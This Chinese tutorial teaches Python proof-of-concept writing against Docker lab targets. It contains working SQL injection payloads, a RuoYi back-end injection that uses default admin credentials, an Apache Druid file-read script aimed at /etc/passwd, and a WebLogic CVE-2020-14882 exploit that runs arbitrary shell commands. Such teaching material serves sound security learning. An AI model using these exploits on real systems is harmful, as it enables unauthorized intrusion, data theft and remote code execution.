Python PoC编写实例:从原理到实践
字数 1172 2025-08-24 07:48:33
Python PoC编写实例:从原理到实践
一、PoC基础概念
PoC (Proof of Concept, 概念验证) 是为了验证某个潜在的漏洞或安全问题而编写的脚本。主要目的是:
- 验证漏洞是否存在
- 提供漏洞存在的证据
- 为后续开发完整利用工具(EXP)奠定基础
二、SQL注入PoC编写
1. 环境搭建
使用Docker搭建sqli-labs漏洞环境:
docker search sqli-lab
docker pull acgpiano/sqli-labs
docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs
2. GET型单引号报错注入(Less-1)
Payload示例:
' AND (updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)) AND 'utgs'='utgs
Python PoC代码:
import re

import requests

# Target: the GET parameter `id` of the Less-1 lab page.
url = "http://192.168.148.155/Less-1/?id=1"
headers = {
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
}
# Error-based probe: updatexml() is handed "~<version>~" as an XPath, so the
# database error message echoes the version back between the two '~' markers.
payload = "' AND (updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)) AND 'utgs'='utgs"
# Accept any value between the markers instead of one hard-coded build string,
# so the check does not depend on the exact MySQL version of the lab image.
# The closing '~' is optional in case the error text is cut short.
error_signature = re.compile(r"XPATH syntax error: '~[^~']*~?'")

res = requests.get(url + payload, headers=headers, timeout=5)
if error_signature.search(res.text):
    print('[+] Vulnerable to SQL injection: ' + url)
else:
    print('[-] Not Vulnerable: ' + url)
3. POST型单引号报错注入(Less-11)
Python PoC代码:
import re

import requests

# Less-11 is the lab page this single-quote payload is written for; the
# surrounding section is titled Less-11 as well.
url = "http://192.168.148.155/Less-11/"
headers = {
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
}
# Login form fields; the probe goes into `uname`.
payload = {
    "uname": "' AND (updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)) AND 'utgs'='utgs",
    "passwd": "123456",
    "submit": "Submit"
}
# Accept any value between the '~' markers instead of one hard-coded build
# string, so the check does not depend on the exact MySQL version.
# The closing '~' is optional in case the error text is cut short.
error_signature = re.compile(r"XPATH syntax error: '~[^~']*~?'")

res = requests.post(url, headers=headers, data=payload, timeout=5)
if error_signature.search(res.text):
    print('[+] Vulnerable to SQL injection: ' + url)
else:
    print('[-] Not Vulnerable: ' + url)
4. POST型单引号延时注入(Less-15)
Payload示例:
1' AND (SELECT 2707 FROM (SELECT(SLEEP(5)))vWgP) AND 'xDGW'='xDGW
Python PoC代码:
import time

import requests

url = "http://192.168.148.155/Less-15/"
headers = {
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
}
# Seconds the injected SLEEP() should stall the query. The payload, the
# request timeout and the verdict threshold are all derived from this value.
SLEEP_SECONDS = 5
payload = {
    "uname": "1' AND (SELECT 2707 FROM (SELECT(SLEEP(%d)))vWgP) AND 'xDGW'='xDGW" % SLEEP_SECONDS,
    "passwd": "123456",
    "submit": "Submit"
}

# monotonic() is unaffected by system clock adjustments, unlike time.time().
start_time = time.monotonic()
try:
    res = requests.post(url, headers=headers, data=payload, timeout=SLEEP_SECONDS + 5)
except requests.exceptions.RequestException as exc:
    # A transport failure says nothing about the injection; report it as such.
    print('[-] Request failed: %s' % exc)
else:
    elapsed = time.monotonic() - start_time
    if elapsed >= SLEEP_SECONDS:
        print('[+] Vulnerable to SQL injection')
    else:
        print('[-] Not vulnerable to SQL injection')
5. 若依v4.6.0后台SQL注入
完整PoC代码:
import requests
import argparse
def argument():
    """Parse the command line of the RuoYi PoC.

    Returns:
        The argparse namespace with ``url``, ``cookie``, ``validateCode``
        (converted to int) and ``bgurl``; all four options are required.
    """
    cli = argparse.ArgumentParser(description="python3 demo.py -u [login_url] -c [cookie] -v [Verification_Code] -b [Vul Links]")
    # (short flag, long flag, value type, help text) for each required option.
    option_table = (
        ('-u', '--url', str, 'Please input the vulnerable url'),
        ('-c', '--cookie', str, 'Please input the vul target cookie'),
        ('-v', '--validateCode', int, 'Please inpute the verification code'),
        ('-b', '--bgurl', str, 'Please inpute the Login background vulnerable url'),
    )
    for short_flag, long_flag, value_type, help_text in option_table:
        cli.add_argument(short_flag, long_flag, type=value_type, metavar='', required=True, help=help_text)
    return cli.parse_args()
def banner():
    """Print the ASCII-art banner of the RuoYi v4.6.0 PoC to stdout."""
    # The empty first and last entries reproduce the blank lines that
    # surround the art.
    art_rows = [
        "",
        "__",
        "| |",
        "| | |_ __",
        "| | |_ v 4.6.0",
        "",
    ]
    print("\n".join(art_rows))
def Poc(url, cookie, validateCode, bgurl):
    """Log in to RuoYi and probe the back-end query for error-based SQL injection.

    Args:
        url: Login endpoint that receives the credential form.
        cookie: Value of the ``Cookie`` header sent with both requests.
        validateCode: Captcha answer submitted with the login form.
        bgurl: Back-end endpoint that receives the ``params[dataScope]`` probe.

    Prints the verdict to stdout and returns ``None``.
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36',
        'Cookie': cookie
    }
    # Login form with the hard-coded admin/admin123 credentials.
    data = {
        'username': 'admin',
        'password': 'admin123',
        'validateCode': validateCode,
        'rememberMe': 'false'
    }
    try:
        res = requests.post(url, headers=headers, data=data, timeout=5)
    except requests.exceptions.RequestException as exc:
        print("[-] Login request failed: %s" % exc)
        return

    if "操作成功" not in res.text:
        # Test the response text itself: a bare string literal is always
        # truthy, so the captcha case could never be told apart from others.
        if "验证码错误" in res.text:
            print("[-] Verification code error, please check the -v value")
        else:
            print("[-] Error Occurred, Please Check you input")
        return

    # requests form-encodes dict keys itself, so they are written unencoded;
    # pre-encoded "%5B"/"%5D" would be encoded a second time on the wire.
    post_data = {
        'pageSize': '10',
        'pageNum': '1',
        'orderByColumn': 'roleSort',
        'isAsc': 'asc',
        'roleName': '',
        'roleKey': '',
        'status': '',
        'params[beginTime]': '',
        'params[endTime]': '',
        # NOTE(review): this value is form-encoded again by requests, so the
        # '+' and '%2523' sequences reach the server as literal characters;
        # confirm that is the intended on-the-wire form.
        'params[dataScope]': 'and+updatexml(1,concat(0x7e,(SELECT+version()),0x7e),1)%2523'
    }
    try:
        probe = requests.post(url=bgurl, data=post_data, headers=headers, timeout=5)
    except requests.exceptions.RequestException as exc:
        print("[-] Probe request failed: %s" % exc)
        return

    if "java.sql.SQLException: XPATH syntax error:" in probe.text:
        print("[+] Vulnerable to SQL injection")
    else:
        print("[-] Not vulnerable to SQL injection")
if __name__ == '__main__':
    # Show the banner, parse the command line, then run the check with the
    # four parsed values.
    banner()
    cli_args = argument()
    Poc(
        url=cli_args.url,
        cookie=cli_args.cookie,
        validateCode=cli_args.validateCode,
        bgurl=cli_args.bgurl,
    )
三、任意文件读取PoC编写
Apache Druid LoadData任意文件读取(CVE-2021-36749)
环境搭建:
# 进入 vulhub 的 apache-druid/CVE-2021-25646 目录(该环境中的 Druid 版本低于 0.22,可同时用于复现 CVE-2021-36749)
docker-compose up -d
影响版本:Apache Druid Version < 0.22
PoC代码:
import requests
import argparse
def argument():
    """Parse the command line of the Apache Druid PoC.

    Returns:
        The argparse namespace whose only attribute is the required ``url``.
    """
    cli = argparse.ArgumentParser(description="usage:python3 demo.py -u [url]")
    url_option = dict(type=str, metavar='', required=True, help='Please input the vulnerable url')
    cli.add_argument('-u', '--url', **url_option)
    return cli.parse_args()
def banner():
    """Print the ASCII-art banner of the PoC to stdout."""
    # Raw string: the art contains a backslash followed by "_", which is not a
    # valid escape sequence and makes a normal string literal emit a warning.
    # The printed text is unchanged.
    print(r"""
__
/ |
| |
| \_
""")
def Poc(url):
    """Probe a Druid sampler endpoint for the LoadData arbitrary file read.

    Posts one sampler spec per candidate ``file://`` URI and looks for content
    typical of that file in the response. Stops at the first hit; reports
    "not vulnerable" only after every candidate has been tried.

    Args:
        url: Endpoint the sampler spec is posted to.

    Prints the verdict to stdout and returns ``None``.
    """
    # One candidate per platform: a Linux file and a Windows file.
    candidate_uris = ["file:///etc/passwd", "file:///C:/Windows/win.ini"]
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)'
    }
    try:
        for uri in candidate_uris:
            post_data = {
                "type": "index",
                "spec": {
                    "type": "index",
                    "ioConfig": {
                        "type": "index",
                        "inputSource": {
                            "type": "http",
                            "uris": [uri]
                        },
                        "inputFormat": {
                            "type": "regex",
                            "pattern": "(.*)",
                            "columns": ["raw"]
                        }
                    },
                    "dataSchema": {
                        "dataSource": "sample",
                        "timestampSpec": {
                            "column": "!!!_no_such_column_!!!",
                            "missingValue": "1970-01-01T00:00:00Z"
                        },
                        "dimensionsSpec": {}
                    },
                    "tuningConfig": {
                        "type": "index"
                    }
                },
                "samplerConfig": {
                    "numRows": 500,
                    "timeoutMs": 15000
                }
            }
            # The client timeout sits just above the 15 s sampler timeout
            # requested in the spec, so a hung server cannot block forever.
            res = requests.post(url, json=post_data, headers=headers, verify=False, allow_redirects=False, timeout=20)
            if "root:x" in res.text or "[fonts]" in res.text:
                print("[+] 存在 Apache Druid LoadData 任意文件读取漏洞")
                break
        else:
            # Reached only when no candidate matched, i.e. the loop never hit
            # `break`.
            print("[-] 不存在 Apache Druid LoadData 任意文件读取漏洞")
    except requests.exceptions.RequestException:
        print("[-] 请检查输入是否有误")
if __name__ == '__main__':
    # Banner first, then run the check against the URL given on the command line.
    banner()
    target_url = argument().url
    Poc(target_url)
四、远程命令执行(RCE)PoC编写
Weblogic CVE-2020-14882未授权远程命令执行
环境搭建:
# 进入CVE-2020-14882目录
docker-compose up -d
影响版本:
- WebLogic Server 10.3.6.0.0
- WebLogic Server 12.1.3.0.0
- WebLogic Server 12.2.1.3.0
- WebLogic Server 12.2.1.4.0
- WebLogic Server 14.1.1.0.0
PoC代码:
import requests
import argparse
import http.client
# Override the version token http.client places in the request line, so that
# every request sent by this script is labelled HTTP/1.0.
setattr(http.client.HTTPConnection, '_http_vsn_str', 'HTTP/1.0')
def argument():
    """Parse the command line of the WebLogic CVE-2020-14882 PoC.

    Returns:
        The argparse namespace with the required ``url`` and ``cmd`` strings.
    """
    cli = argparse.ArgumentParser(description="usage:python3 demo.py -u [url] -c [command]")
    # Both options are required strings and differ only in flags and help text.
    for short_flag, long_flag, help_text in (
        ('-u', '--url', '[*] Please assign vulnerable url'),
        ('-c', '--cmd', '[*] Please assign command'),
    ):
        cli.add_argument(short_flag, long_flag, type=str, metavar='', required=True, help=help_text)
    return cli.parse_args()
def banner():
    """Print the ASCII-art banner of the PoC to stdout."""
    # Raw string: the art contains a backslash followed by "_", which is not a
    # valid escape sequence and makes a normal string literal emit a warning.
    # The printed text is unchanged.
    print(r"""
__
/ |
| |
| \_
""")
def Poc():
    """Post the console request for the lab target and print the response body.

    The target URL and the command come from the command line via
    ``argument()``. The command is sent in the ``cmd`` request header, which
    the posted expression reads back with ``req.getHeader("cmd")``.

    Prints the response text, or an error message when the request fails.
    """
    args = argument()
    # Drop a trailing slash so joining with `path` does not produce "//console".
    url = args.url.rstrip('/')
    cmd = args.cmd
    path = "/console/images/%252E%252E%252Fconsole.portal"
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-GB,en-US;q=0.9,en;q=0.8',
        'Content-Type': 'application/x-www-form-urlencoded',
        'cmd': cmd
    }
    payload = '''_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if (cmd != null) {String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();res.getWriter().write("");}executeThread.interrupt();'''
    try:
        res = requests.post(url=url + path, data=payload, headers=headers, verify=False, allow_redirects=False, timeout=10)
    except requests.exceptions.RequestException as exc:
        # Only transport-level failures are expected here; show the cause
        # instead of hiding it behind the generic hint.
        print("[-] Please Check your url and cmd!")
        print("[-] Request error: %s" % exc)
        return
    print("[+] Command results are as follows: ")
    print(res.text)
if __name__ == '__main__':
    # Banner first, then the PoC, which parses its own command-line options.
    for step in (banner, Poc):
        step()
五、任意文件上传PoC编写
Weblogic任意文件上传(CVE-2018-2894)
环境搭建:
# 进入weblogic CVE-2018-2894目录
docker-compose up -d
影响版本:
- WebLogic Server 10.3.6.0.0
- WebLogic Server 12.1.3.0.0
- WebLogic Server 12.2.1.2.0
- WebLogic Server 12.2.1.3.0
PoC代码:
import requests
import argparse
def argument():
    """Parse the command line of the WebLogic CVE-2018-2894 check.

    Returns:
        The argparse namespace whose only attribute is the required ``url``.
    """
    option_parser = argparse.ArgumentParser(description="usage:python3 demo.py -u [url]")
    option_parser.add_argument(
        '-u',
        '--url',
        type=str,
        metavar='',
        required=True,
        help='Please input the vulnerable url',
    )
    parsed = option_parser.parse_args()
    return parsed
def banner():
    """Print the ASCII-art banner of the PoC to stdout."""
    # Raw string: the art contains a backslash followed by "_", which is not a
    # valid escape sequence and makes a normal string literal emit a warning.
    # The printed text is unchanged.
    print(r"""
__
/ |
| |
| \_
""")
def Poc():
    """Check whether the target exposes the ws_utc settings page.

    Reads the target URL from the command line via ``argument()``, sends a GET
    carrying only a User-Agent header to the ws_utc general-options resource,
    and treats the presence of the ``BasicConfigOptions.workDir`` element in
    the response as the indicator.

    Prints the verdict to stdout and returns ``None``.
    """
    args = argument()
    # Drop a trailing slash so the joined URL does not contain "//ws_utc".
    url = args.url.rstrip('/')
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'
    }
    try:
        res = requests.get(url + "/ws_utc/resources/setting/options/general", headers=headers, timeout=5, verify=False, allow_redirects=False)
    except requests.exceptions.RequestException:
        # Only transport-level failures (bad URL, refused connection, timeout)
        # are expected from the request itself.
        print("[-] 请检查输入是否有误!")
        return
    if "<name>BasicConfigOptions.workDir</name>" in res.text:
        print("[+] 存在 CVE-2018-2894 WebLogic任意文件上传漏洞")
    else:
        print("[-] 不存在 CVE-2018-2894 WebLogic 任意文件上传漏洞")
if __name__ == '__main__':
    # Print the banner, then run the check; Poc() parses the command line itself.
    entry_points = [banner, Poc]
    for run in entry_points:
        run()
六、Python库使用技巧
1. argparse库
用于参数化输入:
import argparse

# Declare one required string option (-u/--url), then parse sys.argv into `args`.
parser = argparse.ArgumentParser(description="usage:python3 demo.py -u [url]")
parser.add_argument(
    '-u',
    '--url',
    type=str,
    metavar='',
    required=True,
    help='Please input the vulnerable url',
)
args = parser.parse_args()
2. sys库
另一种参数化输入方式:
import sys

# Exactly two positional arguments are expected after the script name;
# otherwise print the usage line and exit with status 1.
if len(sys.argv) != 3:
    print("使用方法: python myapp.py <参数1> <参数2>")
    sys.exit(1)
url, command = sys.argv[1], sys.argv[2]
3. json库
处理JSON数据:
import json

# Parse a JSON string into Python objects.
json_str = '{"name": "John", "age": 30, "city": "New York"}'
data = json.loads(json_str)
print(data["name"])

# Serialize Python objects to a JSON string.
data = {"name": "John", "age": 30, "city": "New York"}
json_str = json.dumps(data)
print(json_str)

# Write JSON to a file. This runs before the read below so the snippet works
# on its own even when data.json does not exist yet.
with open("data.json", "w", encoding="utf-8") as json_file:
    json.dump(data, json_file)

# Read JSON back from the file.
with open("data.json", encoding="utf-8") as json_file:
    data = json.load(json_file)
print(data["name"])
4. time库
时间相关操作:
import time

# Current Unix timestamp (seconds since the epoch).
timestamp = time.time()
# Convert the timestamp to a human-readable string.
readable_time = time.ctime(timestamp)
# Pause execution for two seconds.
time.sleep(2)
# Measure how long a piece of code takes. perf_counter() is the clock meant
# for timing intervals; time.time() can jump when the system clock changes.
start_time = time.perf_counter()
# ... code being timed goes here ...
end_time = time.perf_counter()
execution_time = end_time - start_time
5. open函数
文件操作:
# 读取文件
# Write a file (creates it, or truncates an existing one). Writing comes first
# so the reads below work even when file.txt does not exist yet.
with open('file.txt', 'w', encoding='utf-8') as fh:
    fh.write('Hello, World!\n')
# Append to the file.
with open('file.txt', 'a', encoding='utf-8') as fh:
    fh.write('This is an additional line.\n')
# Read the whole file at once.
with open('file.txt', 'r', encoding='utf-8') as fh:
    content = fh.read()
# Read line by line. Each line already ends with '\n', so suppress print's own
# newline to avoid blank lines in the output.
with open('file.txt', 'r', encoding='utf-8') as fh:
    for line in fh:
        print(line, end='')
七、PoC编写总结
- 基本流程:
  - 分析漏洞触发点
  - 确定验证方式(特征码、延时、报错等)
  - 编写请求代码
  - 处理响应判断漏洞存在性
- 关键点:
  - 请求头设置(User-Agent、Cookie等)
  - 请求方法选择(GET/POST)
  - 参数编码处理
  - 响应特征匹配
- 进阶技巧:
  - 使用模块化设计(函数封装)
  - 添加参数化输入
  - 异常处理
  - 多Payload遍历测试
- 注意事项:
  - 遵守法律法规
  - 仅用于授权测试
  - 添加适当的延迟避免对目标造成过大压力
  - 清晰的输出和错误提示